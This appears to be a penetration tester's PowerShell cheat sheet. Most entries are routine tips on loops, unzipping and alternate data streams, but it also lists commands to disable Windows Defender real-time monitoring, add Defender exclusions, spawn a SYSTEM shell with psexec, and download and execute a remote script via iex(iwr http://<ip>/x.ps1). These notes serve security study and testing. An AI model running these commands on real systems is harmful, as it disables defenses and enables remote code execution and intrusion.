xct's notes
Powershell

General

Compact loop

# % is the alias for ForEach-Object
1,2,3,4 | % { Write-Host $_ }

Scan selected ports

# Test-NetConnection exposes -Port (Test-Connection has no such parameter in Windows PowerShell)
22,53,80,443,445 | % { Test-NetConnection -ComputerName <ip> -Port $_ }

Unzip

# Built-in cmdlet (PowerShell 5+)
Expand-Archive -Path <archive path> -DestinationPath <target dir>
# .NET fallback for older hosts without Expand-Archive
Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory("<archive path>", "<target dir>")

Check for hidden streams

Get-Item -Stream * <path>

Disable Windows Defender

powershell.exe -exec bypass -command Set-MpPreference -DisableRealtimeMonitoring $true

Add Defender Exception

Add-MpPreference -ExclusionPath <path>

Check for Constrained Language Mode

# Returns FullLanguage or ConstrainedLanguage
$ExecutionContext.SessionState.LanguageMode

Inject .ps1 into session

# $sess is a PSSession object (e.g. from New-PSSession); the parameter is -Session, not -Sessions
Invoke-Command -FilePath <script> -Session $sess
Enter-PSSession -Session $sess

Run cmd.exe as SYSTEM

psexec.exe -i -s %SystemRoot%\system32\cmd.exe

File Transfer & Execution

iex(iwr http://<ip>/x.ps1 -usebasicparsing)

Prevent Output Truncation

| ft -AutoSize -Wrap   # Format-Table
| fl                   # Format-List

Encrypt files

# https://gallery.technet.microsoft.com/scriptcenter/EncryptDecrypt-files-use-65e7ae5d
$key = New-CryptographyKey -Algorithm AES
# Encrypt the file
Protect-File '.\secrets.txt' -Algorithm AES -Key $key -RemoveSource
# Decrypt the file
Unprotect-File '.\secrets.txt.AES' -Algorithm AES -Key $key -RemoveSource

Alternate Data Stream (ADS)

# List all streams on a file
powershell -command "get-item <file> -stream *"
# Read a specific named stream
powershell -command "get-content <file> -stream root.txt"